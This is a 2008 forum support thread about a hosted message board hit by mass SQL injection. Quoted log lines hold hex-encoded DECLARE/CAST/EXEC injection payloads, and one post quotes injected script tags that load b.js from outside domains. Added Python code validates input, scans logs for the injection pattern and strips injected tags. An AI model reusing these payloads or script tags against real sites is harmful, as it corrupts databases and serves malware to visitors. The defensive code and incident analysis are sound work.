richfed
Average Member
United States
999 Posts
Posted - 28 June 2008 : 07:10:41
At least according to my web host:
We have scanned your site for vulnerability and found the following pages which are vulnerable.
/messageboard/avatar_legend.asp
/messageboard/guestbook.asp
/messageboard/myowngoogle.asp
/messageboard/Photo_Album_view.asp
/messageboard/pop_report.asp
Hope that may help some of you out there.
PS - Not sure where the best place is to post this. Move as appropriate!!
modifichicci
Average Member
Italy
787 Posts
Posted - 28 June 2008 : 08:08:24
I think in Photo_album_view we have to sanitize these variables:
strPhotoName = trim(request.QueryString("PhotoName"))
strDescription = trim(request.QueryString("Description"))
strPhotoSearch = trim(request.QueryString("Photo_Search"))
I think the first two are numeric, so the general fix for numeric could be useful, but the last is a string, so I don't know if a sqlstring is enough or not. There is a validate input function in inc photo functions but at this moment I don't know how to use it.
Ernia e Laparocele Forum di Ernia e Laparocele Acces - MySql Migration Tutorial Adamantine forum |
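The post above distinguishes the two numeric QueryString values from the free-text Photo_Search value. The following is an added example, not Snitz code and not the "general fix for numeric" the post refers to: it shows a whitelist check for the numeric parameters and a bound-parameter query for the string one, using an in-memory SQLite database as a stand-in for the forum's real database. The table, column names and sample rows are constructed; only the three QueryString names come from the post.

```python
import re
import sqlite3

# Added example (not Snitz code). The three QueryString names are taken from
# the post; the table, column names and sample rows are constructed so the
# snippet runs stand-alone on an in-memory SQLite database.

NUMERIC_ONLY = re.compile(r"^[0-9]{1,9}$")


def validate_numeric(raw):
    """Whitelist check for an id parameter: return an int, or None for any
    other content (letters, ';', quotes, an appended statement)."""
    if raw is None:
        return None
    raw = raw.strip()
    return int(raw) if NUMERIC_ONLY.match(raw) else None


def escape_like(term):
    """Escape LIKE wildcards so a search term is matched literally."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def build_demo_db():
    """Constructed photo table standing in for the forum's photo album data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (photo_id INTEGER PRIMARY KEY, "
                 "description TEXT, filename TEXT)")
    conn.executemany("INSERT INTO photos VALUES (?, ?, ?)", [
        (4557, "Sunset over the lake", "sunset.jpg"),
        (5180, "Hiking trail in autumn", "trail.jpg"),
    ])
    return conn


def photo_by_id(conn, query_string_value):
    """PhotoName / Description style lookup: numeric-only, then bound."""
    photo_id = validate_numeric(query_string_value)
    if photo_id is None:
        return None          # reject the request instead of building a query
    return conn.execute("SELECT photo_id, description, filename FROM photos "
                        "WHERE photo_id = ?", (photo_id,)).fetchone()


def photo_search(conn, query_string_value, max_len=100):
    """Photo_Search style free text: length-capped and passed as a bound
    parameter, so quotes and ';' stay data and are never parsed as SQL."""
    term = (query_string_value or "").strip()[:max_len]
    if not term:
        return []
    pattern = "%" + escape_like(term) + "%"
    return conn.execute("SELECT photo_id, filename FROM photos "
                        "WHERE description LIKE ? ESCAPE '\\'",
                        (pattern,)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    print(photo_by_id(db, "4557"))                          # a row
    print(photo_by_id(db, "4557;DECLARE @S VARCHAR(4000)"))  # None: rejected
    print(photo_search(db, "trail"))                         # [(5180, 'trail.jpg')]
    print(photo_search(db, "x' OR 1=1 --"))                 # []: treated as text
```

The point of the two paths is that the numeric parameters never reach the database unless they are a bare integer, while the string parameter is never concatenated into the statement at all, so the question of whether an escaping function is "enough" does not arise for it.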
HuwR
Forum Admin
United Kingdom
20595 Posts
Posted - 28 June 2008 : 08:52:31
I would be interested in why your host thinks all those files are vulnerable. I have seen the results of automated vulnerability checkers, and they were quite frankly completely useless.
If they have manually scanned your logs after an attack, then it is extremely unlikely that more than one file was used for an attack, and it is generally the last file accessed by the hacker, but there may be several attempts on various files prior to the actual successful attempt.
Obviously if they have some better evidence then fair enough.
richfed
Average Member
United States
999 Posts
Posted - 28 June 2008 : 10:00:19
quote: Originally posted by leatherlips
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.
I wish I could answer that! I'm hoping someone can ...
Meanwhile, my host sent this:
We can see a few SQL injection attempts in the logs through the asp script topic.asp
GET /messageboard/topic.asp
topic_ID=4557;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841[...]44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--
80 - 58.187.50.43 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -
- www.mohicanpress.com
GET /messageboard/topic.asp
whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841[...]6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C
4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4
37572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--
80 - 200.90.76.104
GET /messageboard/topic.asp
TOPIC_ID=4035;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841[...]44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--
80 - 190.39.125.85 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -
- www.mohicanpress.com
These are found in the logs just before the first entry of the given pattern.
The sql statements are encoded to Hexadecimal code (start from: SET%20@S=CAST( . You can try to decode it using any online tools which convert Hexadecimal to string).
If someone could make English out of this, there are probably a few here who would be most grateful!!
Edited by - richfed on 28 June 2008 10:06:09 |
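The host's log excerpt shows the shape of these requests: a numeric parameter such as topic_ID followed by ";DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);--". The following is an added example, not the host's tooling and not part of the thread: a small scanner that recognises that shape in IIS W3C log lines, reports which parameter carried it, and decodes the hex literal so an administrator can read what the statement was going to do. The log lines are constructed in IIS style from the entries quoted above; the hex prefix is the one visible on the page (the middle of the payload is not on the page, so only that prefix is decoded), and the 10.0.0.7 line is a constructed ordinary request for comparison.

```python
import re
from urllib.parse import unquote

# Added example, not from the thread. Constructed IIS W3C lines modelled on
# the host's excerpt: date time method stem query port user ip agent status.
# The hex literal is only the prefix visible on the page; the 10.0.0.7 line is
# a constructed benign request.
SAMPLE_LOG = """\
2008-06-27 03:12:45 GET /messageboard/topic.asp topic_ID=4557;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 58.187.50.43 Mozilla/4.0+(compatible;+MSIE+7.0) 200
2008-06-27 03:12:46 GET /messageboard/topic.asp TOPIC_ID=4035 80 - 10.0.0.7 Mozilla/5.0 200
2008-06-27 03:13:02 GET /messageboard/topic.asp whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 200.90.76.104 Mozilla/4.0+(compatible;+MSIE+7.0) 200
"""

# DECLARE @x VARCHAR(n);SET @x=CAST(0x...  -- matched on the URL-decoded query
INJECTION = re.compile(
    r"DECLARE\s+@\w+\s+N?VARCHAR\(\d+\)\s*;\s*SET\s+@\w+\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)",
    re.IGNORECASE)
EXEC_CALL = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE)

# Parameters topic.asp expects to be integers (names taken from the excerpt).
NUMERIC_PARAMS = {"topic_id", "reply_id"}


def parse_line(line):
    """Split one W3C line into the fields the scanner needs, or None."""
    parts = line.split()
    if len(parts) < 10 or parts[2] not in ("GET", "POST"):
        return None
    return {"stem": parts[3], "query": parts[4], "ip": parts[7], "status": parts[9]}


def decode_hex_payload(hex_digits):
    """Turn the 0x... literal back into text. An odd digit count means the
    line was cut short, so decode the complete bytes and flag the cut."""
    truncated = len(hex_digits) % 2 == 1
    if truncated:
        hex_digits = hex_digits[:-1]
    return bytes.fromhex(hex_digits).decode("latin-1"), truncated


def tampered_numeric_params(query):
    """Names of integer parameters whose value is not a plain integer."""
    bad = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() in NUMERIC_PARAMS and not value.lstrip("-").isdigit():
            bad.append(name)
    return bad


def inspect_query(query):
    """Return a finding dict for an injected query string, else None."""
    decoded_query = unquote(query)
    match = INJECTION.search(decoded_query)
    if not match:
        return None
    text, truncated = decode_hex_payload(match.group(1))
    return {"payload": text, "truncated": truncated,
            "exec": bool(EXEC_CALL.search(decoded_query)),
            "params": tampered_numeric_params(query)}


def scan_log(text):
    """Run every line through the detector; returns one dict per hit."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = inspect_query(rec["query"])
        if hit:
            hit.update(ip=rec["ip"], stem=rec["stem"])
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["stem"], f["params"], "exec" if f["exec"] else "",
              repr(f["payload"]), "(cut)" if f["truncated"] else "")
```

Two things the output makes visible that the raw log does not: the decoded prefix reads "DECLARE @T VARCHAR(255),@C VARCHA", i.e. the hex hides an ordinary T-SQL batch rather than anything the application meant to run, and in every hit the carrier is a parameter the script treats as an integer, which is exactly the class of input the numeric check discussed earlier in the thread is meant to reject.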
ruirib
Snitz Forums Admin
Portugal
26364 Posts
Posted - 28 June 2008 : 11:14:48
Rich, you need to fix your forum database; anyone who visits your forum is at risk of getting virus infected. It's amazing that after a couple of days your host hasn't addressed this. The script I posted fixes all of it in a few seconds!
Please take the forum down until it is fixed. If someone unprotected visits your forum, they are at risk, and you will have some responsibility in that, too.
Snitz 3.4 Readme | Like the support? Support Snitz too |
richfed
Average Member
United States
999 Posts
Posted - 28 June 2008 : 14:27:40
Yes, I had inserted that before I sent it to them. They ran it; said 8 rows were infected. I still see the script - <script src=http://www.rid34.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.bin963.com/b.js></script> - in the field Title Image Location in the Main Forum Config area. How in the world can I get that out? I remove it, it just pops back in.
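The tag richfed found in Title Image Location is the visible effect of the injection: text columns, configuration rows included, end up with a script tag appended. The following is an added example, not the script ruirib posted (which is not on this page): it walks every text column of a database, lists the cells that still carry an injected tag, and strips the tags in place. SQLite is used so it runs stand-alone; the table and column names are constructed, and the sample rows use the first of the tags quoted above. Cleaning the data does not close the hole; the input checks discussed earlier in the thread are what stop the rows from being rewritten again.

```python
import re
import sqlite3

# Added example, not the fix script from the thread. Table and column names
# are constructed; the injected tag is the first one quoted in richfed's post.
INJECTED_TAG = re.compile(r"<script\s+src=[^>]*>\s*</script>", re.IGNORECASE)
TEXT_TYPES = ("TEXT", "VARCHAR", "NVARCHAR", "NTEXT", "CHAR")


def build_demo_db():
    """Constructed forum tables with three cells carrying the tag."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE forum_config (cfg_id INTEGER PRIMARY KEY, "
                 "name TEXT, value TEXT)")
    conn.execute("CREATE TABLE topics (topic_id INTEGER PRIMARY KEY, "
                 "subject TEXT, body TEXT)")
    tag = "<script src=http://www.rid34.com/b.js></script>"
    conn.executemany("INSERT INTO forum_config VALUES (?, ?, ?)", [
        (1, "title_image", "images/logo.gif" + tag),
        (2, "forum_title", "Mohican Press Board"),
    ])
    conn.executemany("INSERT INTO topics VALUES (?, ?, ?)", [
        (4557, "Welcome" + tag, "First post" + tag + tag),
        (5180, "Trail report", "No issues here"),
    ])
    conn.commit()
    return conn


def text_columns(conn):
    """Every (table, column) pair with a text-like declared type."""
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        # table names come from the catalogue, not from user input
        for _, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper().split("(")[0] in TEXT_TYPES:
                cols.append((table, name))
    return cols


def find_infected(conn):
    """List (table, column, rowid) for every cell still carrying a tag."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
            ("%<script%",)).fetchall()
        for rowid, value in rows:
            if INJECTED_TAG.search(value or ""):
                hits.append((table, col, rowid))
    return hits


def clean(conn):
    """Strip every injected tag in place; returns the number of cells fixed."""
    fixed = 0
    for table, col, rowid in find_infected(conn):
        (value,) = conn.execute(
            f'SELECT "{col}" FROM "{table}" WHERE rowid = ?', (rowid,)).fetchone()
        cleaned = INJECTED_TAG.sub("", value)
        conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                     (cleaned, rowid))
        fixed += 1
    conn.commit()
    return fixed


if __name__ == "__main__":
    db = build_demo_db()
    print("infected before:", find_infected(db))
    print("cells cleaned:", clean(db))
    print("infected after:", find_infected(db))
```

Running find_infected again after clean is the useful check: an empty result means the data is clear right now, and a non-empty result on a later run means the rows are being rewritten, which points back at the application rather than at the cleanup.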
richfed
Average Member
United States
999 Posts
Posted - 28 June 2008 : 15:42:24
Got it removed, finally. You da man, ruirib!! Thanks ...